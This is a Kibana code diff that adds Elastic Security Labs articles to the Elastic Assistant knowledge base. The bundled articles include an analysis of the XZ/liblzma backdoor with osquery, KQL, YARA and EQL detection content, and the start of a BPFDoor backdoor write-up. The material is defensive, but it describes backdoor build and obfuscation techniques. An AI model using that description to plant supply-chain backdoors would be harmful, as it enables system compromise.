diff --git a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts index ca00075b30e36..4eb41f0c1f136 100644 --- a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts +++ b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.gen.ts @@ -81,4 +81,5 @@ export const ReadKnowledgeBaseResponse = z.object({ is_setup_available: z.boolean().optional(), is_setup_in_progress: z.boolean().optional(), pipeline_exists: z.boolean().optional(), + security_labs_exists: z.boolean().optional(), }); diff --git a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml index 8b4e6bfaca5ec..07d271e860756 100644 --- a/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml +++ b/x-pack/packages/kbn-elastic-assistant-common/impl/schemas/knowledge_base/crud_kb_route.schema.yaml @@ -78,6 +78,8 @@ paths: type: boolean pipeline_exists: type: boolean + security_labs_exists: + type: boolean 400: description: Generic Error content: diff --git a/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx b/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx index 6749b260fbfb9..7f248e1c4c260 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/assistant/api/knowledge_base/use_knowledge_base_status.tsx @@ -90,6 +90,7 @@ export const isKnowledgeBaseSetup = (kbStatus: ReadKnowledgeBaseResponse | undef return ( (kbStatus?.elser_exists && kbStatus?.esql_exists && + kbStatus?.security_labs_exists && kbStatus?.index_exists && kbStatus?.pipeline_exists) ?? false diff --git a/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx b/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx index 95de527ff7a3a..0fabba65110b4 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/assistant/chat_send/use_chat_send.tsx @@ -63,7 +63,8 @@ export const useChatSend = ({ kbStatus?.elser_exists && kbStatus?.index_exists && kbStatus?.pipeline_exists && - kbStatus?.esql_exists; + kbStatus?.esql_exists && + kbStatus?.security_labs_exists; // Handles sending latest user prompt to API const handleSendMessage = useCallback( diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx index 873296ea57840..df254805d9cee 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings.tsx @@ -55,8 +55,13 @@ export const KnowledgeBaseSettings: React.FC = React.memo( // Resource enabled state const isElserEnabled = kbStatus?.elser_exists ?? false; const isESQLEnabled = kbStatus?.esql_exists ?? false; + const isSecurityLabsEnabled = kbStatus?.security_labs_exists ?? 
false; const isKnowledgeBaseSetup = - (isElserEnabled && isESQLEnabled && kbStatus?.index_exists && kbStatus?.pipeline_exists) ?? + (isElserEnabled && + isESQLEnabled && + isSecurityLabsEnabled && + kbStatus?.index_exists && + kbStatus?.pipeline_exists) ?? false; const isSetupInProgress = kbStatus?.is_setup_in_progress ?? false; const isSetupAvailable = kbStatus?.is_setup_available ?? false; diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts index 3d522ab975f3c..75d66a355d781 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts +++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/helpers.ts @@ -12,13 +12,15 @@ import { } from '@kbn/elastic-assistant-common'; import { z } from '@kbn/zod'; -export const isEsqlSystemEntry = ( +export const isSystemEntry = ( entry: KnowledgeBaseEntryResponse ): entry is KnowledgeBaseEntryResponse & { type: DocumentEntryType; - kbResource: 'esql'; + kbResource: 'esql' | 'security_labs'; } => { - return entry.type === DocumentEntryType.value && entry.kbResource === 'esql'; + return ( + entry.type === DocumentEntryType.value && ['esql', 'security_labs'].includes(entry.kbResource) + ); }; export const isKnowledgeBaseEntryCreateProps = ( diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx index 8e551781563f1..a2097177a2ca4 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/index.tsx @@ -43,7 +43,7 @@ import { KnowledgeBaseSettings } from '../knowledge_base_settings'; import { SetupKnowledgeBaseButton } from '../setup_knowledge_base_button'; import { useDeleteKnowledgeBaseEntries } from '../../assistant/api/knowledge_base/entries/use_delete_knowledge_base_entries'; import { - isEsqlSystemEntry, + isSystemEntry, isKnowledgeBaseEntryCreateProps, isKnowledgeBaseEntryResponse, } from './helpers'; @@ -152,13 +152,13 @@ export const KnowledgeBaseSettingsManagement: React.FC = React.memo(() => { openFlyout(); }, isDeleteEnabled: (entry: KnowledgeBaseEntryResponse) => { - return !isEsqlSystemEntry(entry); + return !isSystemEntry(entry); }, onDeleteActionClicked: ({ id }: KnowledgeBaseEntryResponse) => { deleteEntry({ ids: [id] }); }, isEditEnabled: (entry: KnowledgeBaseEntryResponse) => { - return !isEsqlSystemEntry(entry); + return !isSystemEntry(entry); }, onEditActionClicked: ({ id }: KnowledgeBaseEntryResponse) => { const entry = entries.data.find((e) => e.id === id); diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx index 380e6ffedf3ce..5af360a598205 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/knowledge_base_settings_management/use_knowledge_base_table.tsx @@ -18,7 +18,7 @@ import { useAssistantContext } from 
'../../..'; import * as i18n from './translations'; import { BadgesColumn } from '../../assistant/common/components/assistant_settings_management/badges'; import { useInlineActions } from '../../assistant/common/components/assistant_settings_management/inline_actions'; -import { isEsqlSystemEntry } from './helpers'; +import { isSystemEntry } from './helpers'; export const useKnowledgeBaseTable = () => { const { currentUserAvatar } = useAssistantContext(); @@ -29,7 +29,7 @@ export const useKnowledgeBaseTable = () => { if (entry.kbResource === 'user') { return 'userAvatar'; } - if (entry.kbResource === 'esql') { + if (['esql', 'security_labs'].includes(entry.kbResource)) { return 'logoElastic'; } return 'visText'; @@ -83,8 +83,8 @@ export const useKnowledgeBaseTable = () => { render: (entry: KnowledgeBaseEntryResponse) => { // TODO: Look up user from `createdBy` id if privileges allow const userName = entry.users?.[0]?.name ?? 'Unknown'; - const badgeItem = isEsqlSystemEntry(entry) ? 'Elastic' : userName; - const userImage = isEsqlSystemEntry(entry) ? ( + const badgeItem = isSystemEntry(entry) ? 'Elastic' : userName; + const userImage = isSystemEntry(entry) ? ( { { name: i18n.COLUMN_ENTRIES, render: (entry: KnowledgeBaseEntryResponse) => { - return isEsqlSystemEntry(entry) + return isSystemEntry(entry) ? entry.text : entry.type === DocumentEntryType.value ? '1' diff --git a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx index 094d3164c531d..533f3fe35922c 100644 --- a/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx +++ b/x-pack/packages/kbn-elastic-assistant/impl/knowledge_base/setup_knowledge_base_button.tsx @@ -34,7 +34,8 @@ export const SetupKnowledgeBaseButton: React.FC = React.memo(({ display } kbStatus?.elser_exists && kbStatus?.index_exists && kbStatus?.pipeline_exists && - kbStatus?.esql_exists; + kbStatus?.esql_exists && + kbStatus?.security_labs_exists; const onInstallKnowledgeBase = useCallback(() => { setupKB(ESQL_RESOURCE); diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts index 3fe1c36832235..101354a6802b7 100644 --- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts +++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/find.ts @@ -5,7 +5,11 @@ * 2.0. 
*/ -import { MappingRuntimeFields, Sort } from '@elastic/elasticsearch/lib/api/types'; +import { + AggregationsAggregationContainer, + MappingRuntimeFields, + Sort, +} from '@elastic/elasticsearch/lib/api/types'; import { ElasticsearchClient, Logger } from '@kbn/core/server'; import { estypes } from '@elastic/elasticsearch'; @@ -22,6 +26,7 @@ interface FindOptions { index: string; runtimeMappings?: MappingRuntimeFields | undefined; logger: Logger; + aggs?: Record; } export interface FindResponse { @@ -41,6 +46,7 @@ export const findDocuments = async ({ fields, sortOrder, logger, + aggs, }: FindOptions): Promise> => { const query = getQueryFilter({ filter }); let sort: Sort | undefined; @@ -67,6 +73,7 @@ export const findDocuments = async ({ index, seq_no_primary_term: true, size: perPage, + aggs, }); return { data: response, diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts index 9c88765863724..cc74e1f03d3d9 100644 --- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts +++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/index.ts @@ -99,6 +99,7 @@ export class AIAssistantDataClient { sortOrder, filter, fields, + aggs, }: { perPage: number; page: number; @@ -106,6 +107,7 @@ export class AIAssistantDataClient { sortOrder?: string; filter?: string; fields?: string[]; + aggs?: Record; }): Promise>> => { const esClient = await this.options.elasticsearchClientPromise; return findDocuments({ @@ -118,6 +120,7 @@ export class AIAssistantDataClient { index: this.indexTemplateAndPattern.alias, sortOrder: sortOrder as estypes.SortOrder, logger: this.options.logger, + aggs, }); }; } diff --git a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts index 932f90491a1c0..7f665fa7f9a16 100644 --- a/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts +++ b/x-pack/plugins/elastic_assistant/server/ai_assistant_data_clients/knowledge_base/index.ts @@ -35,13 +35,17 @@ import { } from './create_knowledge_base_entry'; import { EsDocumentEntry, EsIndexEntry, EsKnowledgeBaseEntrySchema } from './types'; import { transformESSearchToKnowledgeBaseEntry } from './transforms'; -import { ESQL_DOCS_LOADED_QUERY } from '../../routes/knowledge_base/constants'; +import { + ESQL_DOCS_LOADED_QUERY, + SECURITY_LABS_RESOURCE, +} from '../../routes/knowledge_base/constants'; import { getKBVectorSearchQuery, getStructuredToolForIndexEntry, isModelAlreadyExistsError, } from './helpers'; import { getKBUserFilter } from '../../routes/knowledge_base/entries/utils'; +import { loadSecurityLabs } from '../../lib/langchain/content_loaders/security_labs_loader'; /** * Params for when creating KbDataClient in Request Context Factory. 
Useful if needing to modify @@ -203,9 +207,11 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient { public setupKnowledgeBase = async ({ soClient, installEsqlDocs = true, + installSecurityLabsDocs = true, }: { soClient: SavedObjectsClientContract; installEsqlDocs?: boolean; + installSecurityLabsDocs?: boolean; }): Promise => { if (this.options.getIsKBSetupInProgress()) { this.options.logger.debug('Knowledge Base setup already in progress'); @@ -257,6 +263,16 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient { this.options.logger.debug(`Knowledge Base docs already loaded!`); } } + + if (installSecurityLabsDocs) { + const labsDocsLoaded = await this.isSecurityLabsDocsLoaded(); + if (!labsDocsLoaded) { + this.options.logger.debug(`Loading Security Labs KB docs...`); + await loadSecurityLabs(this, this.options.logger); + } else { + this.options.logger.debug(`Security Labs Knowledge Base docs already loaded!`); + } + } } catch (e) { this.options.setIsKBSetupInProgress(false); this.options.logger.error(`Error setting up Knowledge Base: ${e.message}`); @@ -352,6 +368,18 @@ export class AIAssistantKnowledgeBaseDataClient extends AIAssistantDataClient { return esqlDocs.length > 0; }; + /** + * Returns if Security Labs KB docs have been loaded + */ + public isSecurityLabsDocsLoaded = async (): Promise => { + const securityLabsDocs = await this.getKnowledgeBaseDocumentEntries({ + query: '', + kbResource: SECURITY_LABS_RESOURCE, + required: false, + }); + return securityLabsDocs.length > 0; + }; + /** * Performs similarity search to retrieve LangChain Documents from the knowledge base */ diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md new file mode 100644 index 0000000000000..e29c3b2989edb --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_announcement.md @@ -0,0 +1,15 @@ +--- +title: "2022 Elastic Global Threat Report Announcement" +slug: "2022-elastic-global-threat-report-announcement" +date: "2022-11-30" +description: "Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on." +author: + - slug: devon-kerr +image: "gtr-blog-image-720x420.jpg" +category: + - slug: reports +--- + +Today Elastic Security Labs celebrates another milestone: launching the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report), our inaugural summary of threat trends, forecasts, and recommendations. We analyzed millions of telemetry events from sources around the world to share these insights with you; all part of our continued commitment to transparency, and our mission to protect the world's data. + +You can find the report [here](https://www.elastic.co/explore/security-without-limits/global-threat-report), we're excited to share it with you. 
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md new file mode 100644 index 0000000000000..e676f8c21714c --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape.md @@ -0,0 +1,41 @@ +--- +title: "2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape" +slug: "2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape" +date: "2022-11-30" +description: "A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article." +author: + - slug: ken-exner +image: "gtr-blog-image-720x420.jpg" +category: + - slug: reports +--- + +As the threat landscape continues to evolve, cybersecurity stakes are growing exponentially higher for today’s organizations. Between Log4j, geopolitical tension, and increasing ransomware threats, security is not just at the top of the business agenda but also the societal agenda. Meanwhile, threat actors have adopted new capabilities and methods while increasing their cadence of activity. + +Threat detection and response has come a long way since the firewall dissolved and the cloud took center stage. AI and machine learning, for example, have been major contributors to the advancement of cybersecurity. Machine learning is being used to identify malicious behavior from bad actors by modeling network behavior and improving overall threat detection. + +What’s been difficult is the sea of sameness filled with vendors promising products to mitigate today’s threats while preparing for the next one. As the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) outlines, a significant percentage of all threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? At Elastic, we believe there are several ingredients that are critical to managing today’s threat landscape. + +## Build a program, not just a tool + +Vendors need to start thinking about security products as more than software. They are part of a living, breathing program that takes care and feeding. For Elastic, it’s not just about shipping a solution; it’s about offering a holistic approach to security that happens to come with a great product. It’s sharing insights and best practices and creating a community focused on security data intelligence that extends the value of Elastic Security for customers. + +The 2022 Elastic Threat Report is an important part of that program, and we’re excited to share our knowledge with the community. In addition to vital information from the Elastic Security Labs team, the report provides actionable guidance to security practitioners about how to maximize positive outcomes for their organizations. + +## It takes an (open) community + +The foundation of any good program is a strong community that can support and foster it. Take Elastic’s commitment to open security, for example. 
The community born from vendors being transparent about their security controls, detection rules, and threat logic can be a force multiplier of best practices across the entire industry. + +When vendors engage their experts with experts from across the broader security community about new threats they’ve observed or innovative methods for detecting nuanced attacks, it creates greater scalability of system defenses — not just for the enterprise but also for their customers. + +For example, at Elastic we recently opened our Endpoint Security [protections-artifacts repo](https://github.com/elastic/protections-artifacts), adding to our already open [detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules), to foster further collaboration with our community and be transparent about how we protect users. + +## Treat the cause, not the symptom + +Despite the ever-growing threat landscape and the risks that it poses, many organizations are still treating security symptoms instead of the cause. Companies can no longer afford to keep the security team siloed and separate from the engineering team. The two functions must work closely to build products and solutions that can withstand the barrage of advancing threats. + +At Elastic, we design and build products with security in mind from the start, so it’s baked into every solution we ship to our customers. In fact, we take security so seriously that the office of InfoSec is part of the engineering organization. + +We hope that the 2022 Elastic Global Threat Report will help your understanding of the important shifts in the threat landscape, and provide the information you need to make your organization more resilient, prepared, and protected. + +[Download the 2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report). diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md new file mode 100644 index 0000000000000..1b2fb19a91308 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/500ms_to_midnight.md @@ -0,0 +1,178 @@ +--- +title: "500ms to midnight: XZ / liblzma backdoor" +slug: "500ms-to-midnight" +date: "2024-04-05" +description: "Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises." +author: + - slug: samir-bousseaden + - slug: mika-ayenson + - slug: jake-king +image: "500ms-to-midnight.jpg" +category: + - slug: security-research + - slug: vulnerability-updates +tags: + - linux + - vulnerability + - cve-2024-3094 +--- + +## Key Takeaways + +* On March 29, 2024, Andres Freund identified malicious commits to the command-line utility XZ, impacting versions 5.6.0 and 5.6.1 for Linux, and shared the information on the oss-security mailing list. +* Andres’ discovery was made after an increase of _500ms_ in latency was observed with SSH login attempts initiated from a development system, amongst other anomalies. +* The backdoor identified has been designed to circumvent authentication controls within SSH to remotely execute code, potentially gaining access to other systems in the environment. +* The code commits were added and signed by [JiaT75](https://tukaani.org/xz-backdoor) (now suspended), who contributed to the popular open source project for several years. 
+* Security researchers are still undertaking an initial analysis of the payload, dissecting both the build process and the backdoor. +* Elastic has released both YARA signatures, detection rules, and osquery queries, allowing Linux system maintainers to understand the impact and block potential compromises early. + +## The XZ / liblzma backdoor at a glance + +On March 29 2024, the widely adopted XZ package used within many Linux distributions as a library used by the system to interact with SSH client connections (and many other system utilities) was pulled into the spotlight after a _500ms_ delay with intermittent failures. What began as a routine investigation into that anomaly would take a surprising and unexpected twist: malicious, obfuscated code was planted in the package by a maintainer–code that was also in circulation for a few weeks via a poisoned build process. + +Andres Freund, the developer who initially [identified the malicious contributions](https://www.openwall.com/lists/oss-security/2024/03/29/4), observed that the changes had been implemented in versions `5.6.0` and `5.6.1` of the XZ Utils package but had not been widely adopted across all Linux distributions, outside of select bleeding-edge variants typically used for early-stage testing. + +[Initial analysis](https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b) has shown that the backdoor is designed to circumvent authentication controls in `sshd` via `systemd` and attempts to execute code within a pre-authentication context. Observations made so far have shown that the malicious code is not in its final target state and was perhaps caught early through haphazard mistakes the developer neglected to consider, causing impacts to legitimate SSH use cases. + +Alongside the malicious package being circulated within a small number of Linux distributions, several observations have been made in the popular package management software HomeBrew, which has impacted some macOS users. The maintainers of Homebrew-- and other software packages that included this library-- are presently rolling back to prior versions that aren't impacted by these malicious changes, although mainly out of an abundance of caution, as compromised builds were only targeting deb and rpm packages. + +The following notice was released on the Tukaani Project’s homepage (the project owner of the [XZ Utils Git repository](https://github.com/tukaani-project/xz)) shortly after the news of the backdoor broke. + +![XZ Utils backdoor notification on the Tukaani Project](/assets/images/500ms-to-midnight/image2.png "XZ Utils backdoor notification on the Tukaani Project") + + +The compromise itself, while high risk, is relatively minor in terms of real-world impact given the stage of discovery. This situation should remind security professionals about the importance of understanding supply-chain compromise, monitoring Linux workloads, and auditing system controls. In this situation, defenders had the advantage of time. + +## Backdoor analysis + +### XZ backdoor build process: + +[CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094) explains how the changes in the `liblzma` were created from the malicious additions to the library’s build scripts and directly impacts any software that links the library on an impacted system. + +The maliciously modified build script is divided into three stages, starting with the additions in `m4/build-to-host.m4` and progressing through the obfuscation and execution stages. 
At a high level, some obfuscation techniques include character substitution and selective byte processing commands via the `tr` and `head` commands to decode and execute the malicious payloads in the test files. Interestingly, many impacted tools used are standard Linux system tools typically used by administrators for legitimate purposes. + +The [build process](https://gynvael.coldwind.pl/?lang=en&id=782) runs as follows : + +* **Stage 0:** The initial malicious code additions attempt to decode the Stage 1 script (hidden code segments) by changing byte values from specific test files, which under normal circumstances appear corrupt, to form a valid XZ stream. +* **Stage 1:** This stage leverages a bash file with special checks (e.g., the Linux architecture the script runs on) and Bash commands to analyze the environment (e.g. `[ "$(uname)" = "Linux" ]`) to ensure compatible conditions are met for the backdoor. Depending on the outcome of the checks, additional malicious scripts or payloads may be executed. +* **Stage 2:** This phase involves an infected.txt file, which details the altered extraction and compilation code modifications, namely: + * Reconstruction Data: Byte manipulation and decoding techniques on obfuscated compressed data from test files to reconstruct the malicious payload using commands like `sed` and `awk` + * Obfuscation and Extraction: Complex decryption and obfuscation techniques using the `tr` command to extract the binary backdoor to remain hidden from typical detection mechanisms + * Build Process Manipulation: This changes the build and compilation steps to embed the binary backdoor into Linux system processes + * Extension Mechanism: A design that allows for new scripts and updates to the backdoor without modifying the original payload + * Future Stage Preparation: Sets the groundwork for malicious follow-up activities, like propagating the backdoor + +## Assessing impact: + +Given the limited usage of the impacted beta distributions and software, this compromise should impact few systems. 
Maintainers of Linux systems are however encouraged to ensure systems are not running impacted versions of `xzutils` / `liblzma` by leveraging the following osquery queries: + +[Linux](https://gist.github.com/jamesspi/ee8319f55d49b4f44345c626f80c430f): + +``` +SELECT 'DEB Package' AS source, name, version, + CASE + WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable' + ELSE 'Most likely not vulnerable' + END AS status +FROM deb_packages +WHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%' +UNION +SELECT 'RPM Package' AS source, name, version, + CASE + WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable' + ELSE 'Most likely not vulnerable' + END AS status +FROM rpm_packages +WHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%'; + +``` + +[macOS](https://gist.github.com/jamesspi/5cb060b5e0e2d43222a71c876b56daab): + +``` +SELECT 'Homebrew Package' AS source, name, version, + CASE + WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable' + ELSE 'Most likely not vulnerable' + END AS status +FROM homebrew_packages +WHERE name = 'xz' OR name = 'liblzma'; +``` + +The following KQL query can be used to query Elastic Defend file events: + +``` +event.category : file and host.os.type : (macos or linux) and file.name : liblzma.so.5.6.* +``` + +Alternatively, manually checking the version of XZ running on a system is as simple as running the [following commands](https://x.com/Kostastsale/status/1773890846250926445?s=20) (from researcher [Kostas](https://twitter.com/Kostastsale)) and checking the output version. Remember, versions 5.6.0 and 5.6.1 are impacted and should be rolled back or updated to a newer version. + +``` +for xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings "$xz_p" | grep "xz (XZ Utils)" || echo "No match found for $xz_p"; done +``` + +## Malware protection + +The following [YARA signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Trojan_XZBackdoor.yar) (disk and in-memory) is deployed in Elastic Defend to block the XZ backdoor. + +``` +rule Linux_Trojan_XZBackdoor { + meta: + author = "Elastic Security" + fingerprint = "f1982d1db5aacd2d6b0b4c879f9f75d4413e0d43e58ea7de2b7dff66ec0f93ab" + creation_date = "2024-03-30" + last_modified = "2024-03-31" + threat_name = "Linux.Trojan.XZBackdoor" + reference_sample = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "linux" + strings: + /* potential backdoor kill-switch as per https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#file-hashes-txt-L115 */ + $a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" +/* function signature in liblzma used by sshd */ + $a2 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 } + /* unique byte patterns in backdoored liblzma */ + $b1 = { 48 8D 7C 24 08 F3 AB 48 8D 44 24 08 48 89 D1 4C 89 C7 48 89 C2 E8 ?? ?? ?? ?? 
89 C2 } + $b2 = { 31 C0 49 89 FF B9 16 00 00 00 4D 89 C5 48 8D 7C 24 48 4D 89 CE F3 AB 48 8D 44 24 48 } + $b3 = { 4D 8B 6C 24 08 45 8B 3C 24 4C 8B 63 10 89 85 78 F1 FF FF 31 C0 83 BD 78 F1 FF FF 00 F3 AB 79 07 } + condition: + 1 of ($a*) or all of ($b*) +} +``` + +Detections of this signature will appear in Elastic as follows: + +![Detecting the Linux.Trojan.XZBackdoor signature in Elastic](/assets/images/500ms-to-midnight/image4.png "Detecting the Linux.Trojan.XZBackdoor signature in Elastic") + + +## Behavior Detection + +Leveraging [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint)’s network and process events, we published a new EQL [detection rule](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml) to identify instances where the SSHD service starts, spawns a shell process and immediately terminates unexpectedly all within a very short time span: + +``` +sequence by host.id, user.id with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "sshd" and + process.args == "-D" and process.args == "-R"] by process.pid, process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "sshd" and + process.executable != "/usr/sbin/sshd"] by process.parent.pid, process.parent.entity_id + [process where host.os.type == "linux" and event.action == "end" and process.name == "sshd" and process.exit_code != 0] by process.pid, process.entity_id + [network where host.os.type == "linux" and event.type == "end" and event.action == "disconnect_received" and process.name == "sshd"] by process.pid, process.entity_id +``` + +![Matches while simulating execution via the backdoor using XZBot - github.com/amlweems/xzbot](/assets/images/500ms-to-midnight/image1.png "Matches while simulating execution via the backdoor using XZBot - github.com/amlweems/xzbot") + + + +![Timeline view displaying events matching the EQL query](/assets/images/500ms-to-midnight/image3.png "Timeline view displaying events matching the EQL query") + + +## Linux: the final frontier + +While observations of supply chain-based attacks or exploitation of vulnerabilities rarely reach this level of global press coverage, Elastic’s observations described in the [2023 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) show that Linux-based signature events continue to grow in our dataset. This growth is partially tied to growth in the systems we observe that report on threat behavior, but it strongly suggests that adversaries are becoming increasingly focused on Linux systems. + +Linux is and will continue to be on the [minds of threat groups](https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor), as its widespread adoption across the internet reinforces its importance. In this case, adversarial groups were trying to circumvent existing controls that would allow for future compromise through other means. + +While the objectives of the person(s) behind the XZ backdoor haven’t been made clear yet, it is within the technical capabilities of many threat entities focused on espionage, extortion, destruction of data, intellectual property theft, and human rights abuses. With the ability to execute code on impacted Internet-accessible systems, it’s reasonable to assume that bad actors would further infiltrate victims. 
Elastic Security Labs sees that Linux visibility has been dramatically improving and enterprises have started to effectively manage their Linux populations, but many organizations reacting to this supply chain compromise are still at the start of that process. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md new file mode 100644 index 0000000000000..cc70a80f8e04a --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md @@ -0,0 +1,428 @@ +--- +title: "A peek behind the BPFDoor" +slug: "a-peek-behind-the-bpfdoor" +date: "2022-07-13" +description: "In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment." +author: + - slug: jake-king + - slug: colson-wilhoit +image: "blog-security-detection-720x420.png" +category: + - slug: attack-pattern +--- + +## Preamble + +[BPFDoor](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896) is a backdoor payload specifically crafted for Linux. Its purpose is for long-term persistence in order to gain re-entry into a previously or actively compromised target environment. It notably utilizes BPF along with a number of other techniques to achieve this goal, taking great care to be as efficient and stealthy as possible. PWC researchers discovered this very 